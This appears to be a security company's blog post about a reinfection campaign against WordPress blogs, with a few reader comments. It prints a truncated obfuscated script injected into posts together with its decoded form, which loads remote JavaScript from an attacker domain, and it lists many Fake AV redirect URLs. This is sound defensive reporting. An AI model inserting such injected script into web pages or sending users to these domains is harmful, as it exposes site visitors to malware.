We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a javascript link pointing to welcometotheglobalisnet.com/js.php?kk=25 in all the posts in the database.
Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to http://lessthenaminutehandle.com/js.php?kk=33 (both hosted at 91.193.194.110).
This hack also injects the malware on every post in the database, but this time encoded as:
<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..
Which decodes to:
document.write('<script src="http://lessthenaminutehandle.com/js.php?kk=33..
Unfortunately, the domain being used is not blacklisted by Google (or any AV), so the risk is high for every site visitor… If you want to verify your site to ensure it hasn’t been infected, you can scan it here: Sucuri SiteCheck
What happens when someone clicks an infected site?
They are redirected to one of following sites where the infamous Fake AV is pushed to the user…
http://iuhcypsp.co.cc/scan1/188
http://vycdmonz.co.cc/scan1/188
http://zgfozmcr.co.cc/scan1/188
http://www4.personaldzfnetwork.rr.nu/?6276f6d=m%2BzgmGuilqSsld7K0KGtjOLZ4LTTo6Rj06Jmo6lqa1s%3D
http://www4.bestuhzscanner.rr.nu/?40ee785=m%2BzgmGuUlqWtm9jj16CUlOLZ3mumo2WjqGRkmp1qbFk%3D
http://www4.savezuzarmy.rr.nu/?47f2246dec=m%2BzgmGulkqieoOXjxa%2Bgn6Lm3muipmtsmWJmaW6XmYc%3D
http://www4.protection-leaderro.xe.cx/?ada145=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KkZKjLY5mpwog%3D
http://www4.protection-leaderri.xe.cx/?55db81=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KeZKjLY5mpllk%3D
http://www4.strongnm-network.rr.nu/?38fdf=m%2BzgmGulpaSolNfX0Wqhi%2Bjr26%2FOX9inY56saJyWlIo%3D
http://www3.personal-tcsoft.rr.nu/?7660a2=m%2Bzgl2uilqSsld7K0Gqniefj0rGRo9hjo6Vua5pgkVY%3D
www3.strongcheckera.rr.nu
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.specialprotectionti.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc
Here is the whois for the group responsible for that domain (not Hilary Kneber this time, but since they are using the same IP addresses and intermediary hosts, we assume it is all the same):
Registrant Contact:
Jannet
Jannet Degree admin@lessthenaminutehandle.com
+154654645234 fax: +154654645234
Jose Road 78
SanHose NA 64567
us
We will post more details as we learn more about it.
If your site is infected with malware and you need help, visit Sucuri, we’ll get you cleaned up.
Ben Martin
Luke Leal
Ashley Sand
Denis Sinegubko
Fernando Barbosa
Samuel Odendaal
Alycia Mitchell
Rianna MacLeod
8 comments
Thanks for the update. Which hosting providers are you seeing this on and about how many are you seeing infected?
I guess it is mostly on godaddy as the category name suggests!
I just noticed this on a Joomla site on GoDaddy shared hosting. Although the injected code looks like this:
I decoded some of it and looks like they try to hide it from the Google, Yahoo, and other bots. Sneaky punks!
If you want any info I found, hit me up.
Gosh dang it!
Here’s a new injection:
This is so annoying!
Comments are closed.